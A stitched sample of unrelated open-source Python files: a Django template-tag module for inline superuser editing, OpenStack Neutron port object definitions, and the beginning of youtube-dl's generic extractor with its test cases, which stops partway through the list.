sys.exit(app.exec_())
|
the-stack_106_14759
|
import os
from django import template
from django.utils.safestring import mark_safe
def _get_obj_span(obj, attribute, placeholder, editor_mode):
span = '<span class="djsuperadmin"'
span += ' data-djsa-mode="%s"' % editor_mode
span += ' data-djsa-id="%s"' % str(obj.id)
span += ' data-djsa-getcontenturl="%s"' % str(obj.superadmin_get_url)
span += ' data-djsa-patchcontenturl="%s"' % str(obj.superadmin_patch_url)
span += ">%s</span>" % getattr(obj, attribute, placeholder)
return span
def _get_obj_content(context, obj, attribute, placeholder="New content", editor_mode=1):
if context["request"].user.is_superuser:
return mark_safe(_get_obj_span(obj, attribute, placeholder, editor_mode))
else:
return mark_safe(getattr(obj, attribute, placeholder))
register = template.Library()
@register.simple_tag(takes_context=True)
def superadmin_content(context, obj, attribute):
return _get_obj_content(context, obj, attribute)
@register.simple_tag(takes_context=True)
def superadmin_raw_content(context, obj, attribute):
return _get_obj_content(context, obj, attribute, editor_mode=0)
@register.simple_tag(takes_context=True)
def djsuperadminjs(context):
if (
context["request"].user.is_authenticated
and context["request"].user.is_superuser
):
superadmin_basedir = os.path.abspath(os.path.dirname(__file__))
with open(
os.path.join(superadmin_basedir, "..", "dist", "djsuperadmin.bundle.js"),
"r",
) as js_file:
js = '<script src="https://cdn.ckeditor.com/4.12.1/standard/ckeditor.js"></script>'
js += '<script>var djsa_logout_url="%s";%s</script>' % ("", js_file.read())
return mark_safe(js)
return ""
|
the-stack_106_14760
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from oslo_serialization import jsonutils
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db.models import dns as dns_models
from neutron.db.models import securitygroup as sg_models
from neutron.db import models_v2
from neutron.db.qos import models as qos_models
from neutron.objects import base
from neutron.objects import common_types
from neutron.objects.db import api as obj_db_api
from neutron.plugins.ml2 import models as ml2_models
class PortBindingBase(base.NeutronDbObject):
foreign_keys = {
'Port': {'port_id': 'id'},
}
@classmethod
def modify_fields_to_db(cls, fields):
result = super(PortBindingBase, cls).modify_fields_to_db(fields)
if 'vif_details' in result:
result['vif_details'] = (
cls.filter_to_json_str(result['vif_details']))
return result
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(PortBindingBase, cls).modify_fields_from_db(db_obj)
if 'vif_details' in fields:
if fields['vif_details']:
fields['vif_details'] = jsonutils.loads(fields['vif_details'])
if not fields['vif_details']:
fields['vif_details'] = None
return fields
@obj_base.VersionedObjectRegistry.register
class PortBinding(PortBindingBase):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.PortBinding
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'profile': obj_fields.StringField(),
'vif_type': obj_fields.StringField(),
'vif_details': obj_fields.DictOfStringsField(nullable=True),
'vnic_type': obj_fields.StringField(),
}
primary_keys = ['port_id']
@obj_base.VersionedObjectRegistry.register
class DistributedPortBinding(PortBindingBase):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.DistributedPortBinding
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'profile': obj_fields.StringField(),
'vif_type': obj_fields.StringField(),
'vif_details': obj_fields.DictOfStringsField(nullable=True),
'vnic_type': obj_fields.StringField(),
# NOTE(ihrachys): Fields below are specific to this type of binding. In
# the future, we could think of converging different types of bindings
# into a single field
'status': obj_fields.StringField(),
'router_id': obj_fields.StringField(nullable=True),
}
primary_keys = ['host', 'port_id']
@obj_base.VersionedObjectRegistry.register
class PortBindingLevel(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.PortBindingLevel
primary_keys = ['port_id', 'host', 'level']
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'level': obj_fields.IntegerField(),
'driver': obj_fields.StringField(nullable=True),
'segment': obj_fields.ObjectField(
'NetworkSegment', nullable=True
),
}
synthetic_fields = ['segment']
foreign_keys = {
'Port': {'port_id': 'id'},
}
@classmethod
def get_objects(cls, context, _pager=None, validate_filters=True,
**kwargs):
if not _pager:
_pager = base.Pager()
if not _pager.sorts:
# (NOTE) True means ASC, False is DESC
_pager.sorts = [('port_id', True), ('level', True)]
return super(PortBindingLevel, cls).get_objects(
context, _pager, validate_filters, **kwargs)
@obj_base.VersionedObjectRegistry.register
class IPAllocation(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = models_v2.IPAllocation
fields = {
'port_id': obj_fields.UUIDField(nullable=True),
'subnet_id': obj_fields.UUIDField(),
'network_id': obj_fields.UUIDField(),
'ip_address': obj_fields.IPAddressField(),
}
primary_keys = ['subnet_id', 'network_id', 'ip_address']
foreign_keys = {
'Port': {'port_id': 'id'},
}
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_to_db(cls, fields):
result = super(IPAllocation, cls).modify_fields_to_db(fields)
if 'ip_address' in result:
result['ip_address'] = cls.filter_to_str(result['ip_address'])
return result
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(IPAllocation, cls).modify_fields_from_db(db_obj)
if 'ip_address' in fields:
fields['ip_address'] = netaddr.IPAddress(fields['ip_address'])
return fields
@obj_base.VersionedObjectRegistry.register
class PortDNS(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = dns_models.PortDNS
primary_keys = ['port_id']
foreign_keys = {
'Port': {'port_id': 'id'},
}
fields = {
'port_id': obj_fields.UUIDField(),
'current_dns_name': common_types.DomainNameField(),
'current_dns_domain': common_types.DomainNameField(),
'previous_dns_name': common_types.DomainNameField(),
'previous_dns_domain': common_types.DomainNameField(),
'dns_name': common_types.DomainNameField(),
}
@obj_base.VersionedObjectRegistry.register
class Port(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = models_v2.Port
fields = {
'id': obj_fields.UUIDField(),
'project_id': obj_fields.StringField(nullable=True),
'name': obj_fields.StringField(nullable=True),
'network_id': obj_fields.UUIDField(),
'mac_address': common_types.MACAddressField(),
'admin_state_up': obj_fields.BooleanField(),
'device_id': obj_fields.StringField(),
'device_owner': obj_fields.StringField(),
'status': obj_fields.StringField(),
'allowed_address_pairs': obj_fields.ListOfObjectsField(
'AllowedAddressPair', nullable=True
),
'binding': obj_fields.ObjectField(
'PortBinding', nullable=True
),
'dhcp_options': obj_fields.ListOfObjectsField(
'ExtraDhcpOpt', nullable=True
),
'distributed_binding': obj_fields.ObjectField(
'DistributedPortBinding', nullable=True
),
'dns': obj_fields.ObjectField('PortDNS', nullable=True),
'fixed_ips': obj_fields.ListOfObjectsField(
'IPAllocation', nullable=True
),
# TODO(ihrachys): consider converting to boolean
'security': obj_fields.ObjectField(
'PortSecurity', nullable=True
),
'security_group_ids': common_types.SetOfUUIDsField(
nullable=True,
# TODO(ihrachys): how do we safely pass a mutable default?
default=None,
),
'qos_policy_id': obj_fields.UUIDField(nullable=True, default=None),
'binding_levels': obj_fields.ListOfObjectsField(
'PortBindingLevel', nullable=True
),
# TODO(ihrachys): consider adding a 'dns_assignment' fully synthetic
# field in later object iterations
}
synthetic_fields = [
'allowed_address_pairs',
'binding',
'binding_levels',
'dhcp_options',
'distributed_binding',
'dns',
'fixed_ips',
'qos_policy_id',
'security',
'security_group_ids',
]
fields_need_translation = {
'binding': 'port_binding',
'dhcp_options': 'dhcp_opts',
'distributed_binding': 'distributed_port_binding',
'security': 'port_security',
}
def create(self):
fields = self.obj_get_changes()
with db_api.autonested_transaction(self.obj_context.session):
sg_ids = self.security_group_ids
if sg_ids is None:
sg_ids = set()
qos_policy_id = self.qos_policy_id
super(Port, self).create()
if 'security_group_ids' in fields:
self._attach_security_groups(sg_ids)
if 'qos_policy_id' in fields:
self._attach_qos_policy(qos_policy_id)
def update(self):
fields = self.obj_get_changes()
with db_api.autonested_transaction(self.obj_context.session):
super(Port, self).update()
if 'security_group_ids' in fields:
self._attach_security_groups(fields['security_group_ids'])
if 'qos_policy_id' in fields:
self._attach_qos_policy(fields['qos_policy_id'])
def _attach_qos_policy(self, qos_policy_id):
# TODO(ihrachys): introduce an object for the binding to isolate
# database access in a single place, currently scattered between port
# and policy objects
obj_db_api.delete_objects(
self.obj_context, qos_models.QosPortPolicyBinding, port_id=self.id)
if qos_policy_id:
obj_db_api.create_object(
self.obj_context, qos_models.QosPortPolicyBinding,
{'port_id': self.id, 'policy_id': qos_policy_id}
)
self.qos_policy_id = qos_policy_id
self.obj_reset_changes(['qos_policy_id'])
def _attach_security_groups(self, sg_ids):
# TODO(ihrachys): consider introducing an (internal) object for the
# binding to decouple database operations a bit more
obj_db_api.delete_objects(
self.obj_context, sg_models.SecurityGroupPortBinding,
port_id=self.id,
)
if sg_ids:
for sg_id in sg_ids:
self._attach_security_group(sg_id)
self.security_group_ids = sg_ids
self.obj_reset_changes(['security_group_ids'])
def _attach_security_group(self, sg_id):
obj_db_api.create_object(
self.obj_context, sg_models.SecurityGroupPortBinding,
{'port_id': self.id, 'security_group_id': sg_id}
)
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_to_db(cls, fields):
result = super(Port, cls).modify_fields_to_db(fields)
if 'mac_address' in result:
result['mac_address'] = cls.filter_to_str(result['mac_address'])
return result
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(Port, cls).modify_fields_from_db(db_obj)
if 'mac_address' in fields:
fields['mac_address'] = utils.AuthenticEUI(fields['mac_address'])
distributed_port_binding = fields.get('distributed_binding')
if distributed_port_binding:
fields['distributed_binding'] = fields['distributed_binding'][0]
else:
fields['distributed_binding'] = None
return fields
def from_db_object(self, db_obj):
super(Port, self).from_db_object(db_obj)
# extract security group bindings
if db_obj.get('security_groups', []):
self.security_group_ids = {
sg.security_group_id
for sg in db_obj.security_groups
}
else:
self.security_group_ids = set()
self.obj_reset_changes(['security_group_ids'])
# extract qos policy binding
if db_obj.get('qos_policy_binding'):
self.qos_policy_id = (
db_obj.qos_policy_binding.policy_id
)
else:
self.qos_policy_id = None
self.obj_reset_changes(['qos_policy_id'])
|
the-stack_106_14761
|
# coding: utf-8
from __future__ import unicode_literals
import os
import re
import sys
from .common import InfoExtractor
from .youtube import YoutubeIE
from ..compat import (
compat_etree_fromstring,
compat_str,
compat_urllib_parse_unquote,
compat_urlparse,
compat_xml_parse_error,
)
from ..utils import (
determine_ext,
ExtractorError,
float_or_none,
HEADRequest,
is_html,
js_to_json,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
sanitized_Request,
smuggle_url,
unescapeHTML,
unified_strdate,
unsmuggle_url,
UnsupportedError,
xpath_text,
)
from .commonprotocols import RtmpIE
from .brightcove import (
BrightcoveLegacyIE,
BrightcoveNewIE,
)
from .nexx import (
NexxIE,
NexxEmbedIE,
)
from .nbc import NBCSportsVPlayerIE
from .ooyala import OoyalaIE
from .rutv import RUTVIE
from .tvc import TVCIE
from .sportbox import SportBoxIE
from .smotri import SmotriIE
from .myvi import MyviIE
from .condenast import CondeNastIE
from .udn import UDNEmbedIE
from .senateisvp import SenateISVPIE
from .svt import SVTIE
from .pornhub import PornHubIE
from .xhamster import XHamsterEmbedIE
from .tnaflix import TNAFlixNetworkEmbedIE
from .drtuber import DrTuberIE
from .redtube import RedTubeIE
from .tube8 import Tube8IE
from .vimeo import VimeoIE
from .dailymotion import DailymotionIE
from .dailymail import DailyMailIE
from .onionstudios import OnionStudiosIE
from .viewlift import ViewLiftEmbedIE
from .mtv import MTVServicesEmbeddedIE
from .pladform import PladformIE
from .videomore import VideomoreIE
from .webcaster import WebcasterFeedIE
from .googledrive import GoogleDriveIE
from .jwplatform import JWPlatformIE
from .digiteka import DigitekaIE
from .arkena import ArkenaIE
from .instagram import InstagramIE
from .liveleak import LiveLeakIE
from .threeqsdn import ThreeQSDNIE
from .theplatform import ThePlatformIE
from .kaltura import KalturaIE
from .eagleplatform import EaglePlatformIE
from .facebook import FacebookIE
from .soundcloud import SoundcloudEmbedIE
from .tunein import TuneInBaseIE
from .vbox7 import Vbox7IE
from .dbtv import DBTVIE
from .piksel import PikselIE
from .videa import VideaIE
from .twentymin import TwentyMinutenIE
from .ustream import UstreamIE
from .videopress import VideoPressIE
from .rutube import RutubeIE
from .limelight import LimelightBaseIE
from .anvato import AnvatoIE
from .washingtonpost import WashingtonPostIE
from .wistia import WistiaIE
from .mediaset import MediasetIE
from .joj import JojIE
from .megaphone import MegaphoneIE
from .vzaar import VzaarIE
from .channel9 import Channel9IE
from .vshare import VShareIE
from .mediasite import MediasiteIE
from .springboardplatform import SpringboardPlatformIE
from .yapfiles import YapFilesIE
from .vice import ViceIE
from .xfileshare import XFileShareIE
from .cloudflarestream import CloudflareStreamIE
from .peertube import PeerTubeIE
from .teachable import TeachableIE
from .indavideo import IndavideoEmbedIE
from .apa import APAIE
from .foxnews import FoxNewsIE
from .viqeo import ViqeoIE
from .expressen import ExpressenIE
from .zype import ZypeIE
from .odnoklassniki import OdnoklassnikiIE
from .kinja import KinjaEmbedIE
class GenericIE(InfoExtractor):
IE_DESC = 'Generic downloader that works on some sites'
_VALID_URL = r'.*'
IE_NAME = 'generic'
_TESTS = [
# Direct link to a video
{
'url': 'http://media.w3.org/2010/05/sintel/trailer.mp4',
'md5': '67d406c2bcb6af27fa886f31aa934bbe',
'info_dict': {
'id': 'trailer',
'ext': 'mp4',
'title': 'trailer',
'upload_date': '20100513',
}
},
# Direct link to media delivered compressed (until Accept-Encoding is *)
{
'url': 'http://calimero.tk/muzik/FictionJunction-Parallel_Hearts.flac',
'md5': '128c42e68b13950268b648275386fc74',
'info_dict': {
'id': 'FictionJunction-Parallel_Hearts',
'ext': 'flac',
'title': 'FictionJunction-Parallel_Hearts',
'upload_date': '20140522',
},
'expected_warnings': [
'URL could be a direct video link, returning it as such.'
],
'skip': 'URL invalid',
},
# Direct download with broken HEAD
{
'url': 'http://ai-radio.org:8000/radio.opus',
'info_dict': {
'id': 'radio',
'ext': 'opus',
'title': 'radio',
},
'params': {
'skip_download': True, # infinite live stream
},
'expected_warnings': [
r'501.*Not Implemented',
r'400.*Bad Request',
],
},
# Direct link with incorrect MIME type
{
'url': 'http://ftp.nluug.nl/video/nluug/2014-11-20_nj14/zaal-2/5_Lennart_Poettering_-_Systemd.webm',
'md5': '4ccbebe5f36706d85221f204d7eb5913',
'info_dict': {
'url': 'http://ftp.nluug.nl/video/nluug/2014-11-20_nj14/zaal-2/5_Lennart_Poettering_-_Systemd.webm',
'id': '5_Lennart_Poettering_-_Systemd',
'ext': 'webm',
'title': '5_Lennart_Poettering_-_Systemd',
'upload_date': '20141120',
},
'expected_warnings': [
'URL could be a direct video link, returning it as such.'
]
},
# RSS feed
{
'url': 'http://phihag.de/2014/youtube-dl/rss2.xml',
'info_dict': {
'id': 'http://phihag.de/2014/youtube-dl/rss2.xml',
'title': 'Zero Punctuation',
'description': 're:.*groundbreaking video review series.*'
},
'playlist_mincount': 11,
},
# RSS feed with enclosure
{
'url': 'http://podcastfeeds.nbcnews.com/audio/podcast/MSNBC-MADDOW-NETCAST-M4V.xml',
'info_dict': {
'id': 'pdv_maddow_netcast_m4v-02-27-2015-201624',
'ext': 'm4v',
'upload_date': '20150228',
'title': 'pdv_maddow_netcast_m4v-02-27-2015-201624',
}
},
# RSS feed with enclosures and unsupported link URLs
{
'url': 'http://www.hellointernet.fm/podcast?format=rss',
'info_dict': {
'id': 'http://www.hellointernet.fm/podcast?format=rss',
'description': 'CGP Grey and Brady Haran talk about YouTube, life, work, whatever.',
'title': 'Hello Internet',
},
'playlist_mincount': 100,
},
# SMIL from http://videolectures.net/promogram_igor_mekjavic_eng
{
'url': 'http://videolectures.net/promogram_igor_mekjavic_eng/video/1/smil.xml',
'info_dict': {
'id': 'smil',
'ext': 'mp4',
'title': 'Automatics, robotics and biocybernetics',
'description': 'md5:815fc1deb6b3a2bff99de2d5325be482',
'upload_date': '20130627',
'formats': 'mincount:16',
'subtitles': 'mincount:1',
},
'params': {
'force_generic_extractor': True,
'skip_download': True,
},
},
# SMIL from http://www1.wdr.de/mediathek/video/livestream/index.html
{
'url': 'http://metafilegenerator.de/WDR/WDR_FS/hds/hds.smil',
'info_dict': {
'id': 'hds',
'ext': 'flv',
'title': 'hds',
'formats': 'mincount:1',
},
'params': {
'skip_download': True,
},
},
# SMIL from https://www.restudy.dk/video/play/id/1637
{
'url': 'https://www.restudy.dk/awsmedia/SmilDirectory/video_1637.xml',
'info_dict': {
'id': 'video_1637',
'ext': 'flv',
'title': 'video_1637',
'formats': 'mincount:3',
},
'params': {
'skip_download': True,
},
},
# SMIL from http://adventure.howstuffworks.com/5266-cool-jobs-iditarod-musher-video.htm
{
'url': 'http://services.media.howstuffworks.com/videos/450221/smil-service.smil',
'info_dict': {
'id': 'smil-service',
'ext': 'flv',
'title': 'smil-service',
'formats': 'mincount:1',
},
'params': {
'skip_download': True,
},
},
# SMIL from http://new.livestream.com/CoheedandCambria/WebsterHall/videos/4719370
{
'url': 'http://api.new.livestream.com/accounts/1570303/events/1585861/videos/4719370.smil',
'info_dict': {
'id': '4719370',
'ext': 'mp4',
'title': '571de1fd-47bc-48db-abf9-238872a58d1f',
'formats': 'mincount:3',
},
'params': {
'skip_download': True,
},
},
# XSPF playlist from http://www.telegraaf.nl/tv/nieuws/binnenland/24353229/__Tikibad_ontruimd_wegens_brand__.html
{
'url': 'http://www.telegraaf.nl/xml/playlist/2015/8/7/mZlp2ctYIUEB.xspf',
'info_dict': {
'id': 'mZlp2ctYIUEB',
'ext': 'mp4',
'title': 'Tikibad ontruimd wegens brand',
'description': 'md5:05ca046ff47b931f9b04855015e163a4',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 33,
},
'params': {
'skip_download': True,
},
},
# MPD from http://dash-mse-test.appspot.com/media.html
{
'url': 'http://yt-dash-mse-test.commondatastorage.googleapis.com/media/car-20120827-manifest.mpd',
'md5': '4b57baab2e30d6eb3a6a09f0ba57ef53',
'info_dict': {
'id': 'car-20120827-manifest',
'ext': 'mp4',
'title': 'car-20120827-manifest',
'formats': 'mincount:9',
'upload_date': '20130904',
},
'params': {
'format': 'bestvideo',
},
},
# m3u8 served with Content-Type: audio/x-mpegURL; charset=utf-8
{
'url': 'http://once.unicornmedia.com/now/master/playlist/bb0b18ba-64f5-4b1b-a29f-0ac252f06b68/77a785f3-5188-4806-b788-0893a61634ed/93677179-2d99-4ef4-9e17-fe70d49abfbf/content.m3u8',
'info_dict': {
'id': 'content',
'ext': 'mp4',
'title': 'content',
'formats': 'mincount:8',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'skip': 'video gone',
},
# m3u8 served with Content-Type: text/plain
{
'url': 'http://www.nacentapps.com/m3u8/index.m3u8',
'info_dict': {
'id': 'index',
'ext': 'mp4',
'title': 'index',
'upload_date': '20140720',
'formats': 'mincount:11',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'skip': 'video gone',
},
# google redirect
{
'url': 'http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CCUQtwIwAA&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DcmQHVoWB5FY&ei=F-sNU-LLCaXk4QT52ICQBQ&usg=AFQjCNEw4hL29zgOohLXvpJ-Bdh2bils1Q&bvm=bv.61965928,d.bGE',
'info_dict': {
'id': 'cmQHVoWB5FY',
'ext': 'mp4',
'upload_date': '20130224',
'uploader_id': 'TheVerge',
'description': r're:^Chris Ziegler takes a look at the\.*',
'uploader': 'The Verge',
'title': 'First Firefox OS phones side-by-side',
},
'params': {
'skip_download': False,
}
},
{
# redirect in Refresh HTTP header
'url': 'https://www.facebook.com/l.php?u=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DpO8h3EaFRdo&h=TAQHsoToz&enc=AZN16h-b6o4Zq9pZkCCdOLNKMN96BbGMNtcFwHSaazus4JHT_MFYkAA-WARTX2kvsCIdlAIyHZjl6d33ILIJU7Jzwk_K3mcenAXoAzBNoZDI_Q7EXGDJnIhrGkLXo_LJ_pAa2Jzbx17UHMd3jAs--6j2zaeto5w9RTn8T_1kKg3fdC5WPX9Dbb18vzH7YFX0eSJmoa6SP114rvlkw6pkS1-T&s=1',
'info_dict': {
'id': 'pO8h3EaFRdo',
'ext': 'mp4',
'title': 'Tripeo Boiler Room x Dekmantel Festival DJ Set',
'description': 'md5:6294cc1af09c4049e0652b51a2df10d5',
'upload_date': '20150917',
'uploader_id': 'brtvofficial',
'uploader': 'Boiler Room',
},
'params': {
'skip_download': False,
},
},
{
'url': 'http://www.hodiho.fr/2013/02/regis-plante-sa-jeep.html',
'md5': '85b90ccc9d73b4acd9138d3af4c27f89',
'info_dict': {
'id': '13601338388002',
'ext': 'mp4',
'uploader': 'www.hodiho.fr',
'title': 'R\u00e9gis plante sa Jeep',
}
},
# bandcamp page with custom domain
{
'add_ie': ['Bandcamp'],
'url': 'http://bronyrock.com/track/the-pony-mash',
'info_dict': {
'id': '3235767654',
'ext': 'mp3',
'title': 'The Pony Mash',
'uploader': 'M_Pallante',
},
'skip': 'There is a limit of 200 free downloads / month for the test song',
},
{
# embedded brightcove video
# it also tests brightcove videos that need to set the 'Referer'
# in the http requests
'add_ie': ['BrightcoveLegacy'],
'url': 'http://www.bfmtv.com/video/bfmbusiness/cours-bourse/cours-bourse-l-analyse-technique-154522/',
'info_dict': {
'id': '2765128793001',
'ext': 'mp4',
'title': 'Le cours de bourse : l’analyse technique',
'description': 'md5:7e9ad046e968cb2d1114004aba466fd9',
'uploader': 'BFM BUSINESS',
},
'params': {
'skip_download': True,
},
},
{
# embedded with itemprop embedURL and video id spelled as `idVideo`
'add_id': ['BrightcoveLegacy'],
'url': 'http://bfmbusiness.bfmtv.com/mediaplayer/chroniques/olivier-delamarche/',
'info_dict': {
'id': '5255628253001',
'ext': 'mp4',
'title': 'md5:37c519b1128915607601e75a87995fc0',
'description': 'md5:37f7f888b434bb8f8cc8dbd4f7a4cf26',
'uploader': 'BFM BUSINESS',
'uploader_id': '876450612001',
'timestamp': 1482255315,
'upload_date': '20161220',
},
'params': {
'skip_download': True,
},
},
{
# https://github.com/ytdl-org/youtube-dl/issues/2253
'url': 'http://bcove.me/i6nfkrc3',
'md5': '0ba9446db037002366bab3b3eb30c88c',
'info_dict': {
'id': '3101154703001',
'ext': 'mp4',
'title': 'Still no power',
'uploader': 'thestar.com',
'description': 'Mississauga resident David Farmer is still out of power as a result of the ice storm a month ago. To keep the house warm, Farmer cuts wood from his property for a wood burning stove downstairs.',
},
'add_ie': ['BrightcoveLegacy'],
'skip': 'video gone',
},
{
'url': 'http://www.championat.com/video/football/v/87/87499.html',
'md5': 'fb973ecf6e4a78a67453647444222983',
'info_dict': {
'id': '3414141473001',
'ext': 'mp4',
'title': 'Видео. Удаление Дзагоева (ЦСКА)',
'description': 'Онлайн-трансляция матча ЦСКА - "Волга"',
'uploader': 'Championat',
},
},
{
# https://github.com/ytdl-org/youtube-dl/issues/3541
'add_ie': ['BrightcoveLegacy'],
'url': 'http://www.kijk.nl/sbs6/leermijvrouwenkennen/videos/jqMiXKAYan2S/aflevering-1',
'info_dict': {
'id': '3866516442001',
'ext': 'mp4',
'title': 'Leer mij vrouwen kennen: Aflevering 1',
'description': 'Leer mij vrouwen kennen: Aflevering 1',
'uploader': 'SBS Broadcasting',
},
'skip': 'Restricted to Netherlands',
'params': {
'skip_download': True, # m3u8 download
},
},
{
# Brightcove video in <iframe>
'url': 'http://www.un.org/chinese/News/story.asp?NewsID=27724',
'md5': '36d74ef5e37c8b4a2ce92880d208b968',
'info_dict': {
'id': '5360463607001',
'ext': 'mp4',
'title': '叙利亚失明儿童在废墟上演唱《心跳》 呼吁获得正常童年生活',
'description': '联合国儿童基金会中东和北非区域大使、作曲家扎德·迪拉尼(Zade Dirani)在3月15日叙利亚冲突爆发7周年纪念日之际发布了为叙利亚谱写的歌曲《心跳》(HEARTBEAT),为受到六年冲突影响的叙利亚儿童发出强烈呐喊,呼吁世界做出共同努力,使叙利亚儿童重新获得享有正常童年生活的权利。',
'uploader': 'United Nations',
'uploader_id': '1362235914001',
'timestamp': 1489593889,
'upload_date': '20170315',
},
'add_ie': ['BrightcoveLegacy'],
},
{
# Brightcove with alternative playerID key
'url': 'http://www.nature.com/nmeth/journal/v9/n7/fig_tab/nmeth.2062_SV1.html',
'info_dict': {
'id': 'nmeth.2062_SV1',
'title': 'Simultaneous multiview imaging of the Drosophila syncytial blastoderm : Quantitative high-speed imaging of entire developing embryos with simultaneous multiview light-sheet microscopy : Nature Methods : Nature Research',
},
'playlist': [{
'info_dict': {
'id': '2228375078001',
'ext': 'mp4',
'title': 'nmeth.2062-sv1',
'description': 'nmeth.2062-sv1',
'timestamp': 1363357591,
'upload_date': '20130315',
'uploader': 'Nature Publishing Group',
'uploader_id': '1964492299001',
},
}],
},
{
# Brightcove with UUID in videoPlayer
'url': 'http://www8.hp.com/cn/zh/home.html',
'info_dict': {
'id': '5255815316001',
'ext': 'mp4',
'title': 'Sprocket Video - China',
'description': 'Sprocket Video - China',
'uploader': 'HP-Video Gallery',
'timestamp': 1482263210,
'upload_date': '20161220',
'uploader_id': '1107601872001',
},
'params': {
'skip_download': True, # m3u8 download
},
'skip': 'video rotates...weekly?',
},
{
# Brightcove:new type [2].
'url': 'http://www.delawaresportszone.com/video-st-thomas-more-earns-first-trip-to-basketball-semis',
'md5': '2b35148fcf48da41c9fb4591650784f3',
'info_dict': {
'id': '5348741021001',
'ext': 'mp4',
'upload_date': '20170306',
'uploader_id': '4191638492001',
'timestamp': 1488769918,
'title': 'VIDEO: St. Thomas More earns first trip to basketball semis',
},
},
{
# Alternative brightcove <video> attributes
'url': 'http://www.programme-tv.net/videos/extraits/81095-guillaume-canet-evoque-les-rumeurs-d-infidelite-de-marion-cotillard-avec-brad-pitt-dans-vivement-dimanche/',
'info_dict': {
'id': '81095-guillaume-canet-evoque-les-rumeurs-d-infidelite-de-marion-cotillard-avec-brad-pitt-dans-vivement-dimanche',
'title': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche, Extraits : toutes les vidéos avec Télé-Loisirs",
},
'playlist': [{
'md5': '732d22ba3d33f2f3fc253c39f8f36523',
'info_dict': {
'id': '5311302538001',
'ext': 'mp4',
'title': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche",
'description': "Guillaume Canet évoque les rumeurs d'infidélité de Marion Cotillard avec Brad Pitt dans Vivement Dimanche (France 2, 5 février 2017)",
'timestamp': 1486321708,
'upload_date': '20170205',
'uploader_id': '800000640001',
},
'only_matching': True,
}],
},
{
# Brightcove with UUID in videoPlayer
'url': 'http://www8.hp.com/cn/zh/home.html',
'info_dict': {
'id': '5255815316001',
'ext': 'mp4',
'title': 'Sprocket Video - China',
'description': 'Sprocket Video - China',
'uploader': 'HP-Video Gallery',
'timestamp': 1482263210,
'upload_date': '20161220',
'uploader_id': '1107601872001',
},
'params': {
'skip_download': True, # m3u8 download
},
},
# ooyala video
{
'url': 'http://www.rollingstone.com/music/videos/norwegian-dj-cashmere-cat-goes-spartan-on-with-me-premiere-20131219',
'md5': '166dd577b433b4d4ebfee10b0824d8ff',
'info_dict': {
'id': 'BwY2RxaTrTkslxOfcan0UCf0YqyvWysJ',
'ext': 'mp4',
'title': '2cc213299525360.mov', # that's what we get
'duration': 238.231,
},
'add_ie': ['Ooyala'],
},
{
# ooyala video embedded with http://player.ooyala.com/iframe.js
'url': 'http://www.macrumors.com/2015/07/24/steve-jobs-the-man-in-the-machine-first-trailer/',
'info_dict': {
'id': 'p0MGJndjoG5SOKqO_hZJuZFPB-Tr5VgB',
'ext': 'mp4',
'title': '"Steve Jobs: Man in the Machine" trailer',
'description': 'The first trailer for the Alex Gibney documentary "Steve Jobs: Man in the Machine."',
'duration': 135.427,
},
'params': {
'skip_download': True,
},
'skip': 'movie expired',
},
# ooyala video embedded with http://player.ooyala.com/static/v4/production/latest/core.min.js
{
'url': 'http://wnep.com/2017/07/22/steampunk-fest-comes-to-honesdale/',
'info_dict': {
'id': 'lwYWYxYzE6V5uJMjNGyKtwwiw9ZJD7t2',
'ext': 'mp4',
'title': 'Steampunk Fest Comes to Honesdale',
'duration': 43.276,
},
'params': {
'skip_download': True,
}
},
# embed.ly video
{
'url': 'http://www.tested.com/science/weird/460206-tested-grinding-coffee-2000-frames-second/',
'info_dict': {
'id': '9ODmcdjQcHQ',
'ext': 'mp4',
'title': 'Tested: Grinding Coffee at 2000 Frames Per Second',
'upload_date': '20140225',
'description': 'md5:06a40fbf30b220468f1e0957c0f558ff',
'uploader': 'Tested',
'uploader_id': 'testedcom',
},
# No need to test YoutubeIE here
'params': {
'skip_download': True,
},
},
# funnyordie embed
{
'url': 'http://www.theguardian.com/world/2014/mar/11/obama-zach-galifianakis-between-two-ferns',
'info_dict': {
'id': '18e820ec3f',
'ext': 'mp4',
'title': 'Between Two Ferns with Zach Galifianakis: President Barack Obama',
'description': 'Episode 18: President Barack Obama sits down with Zach Galifianakis for his most memorable interview yet.',
},
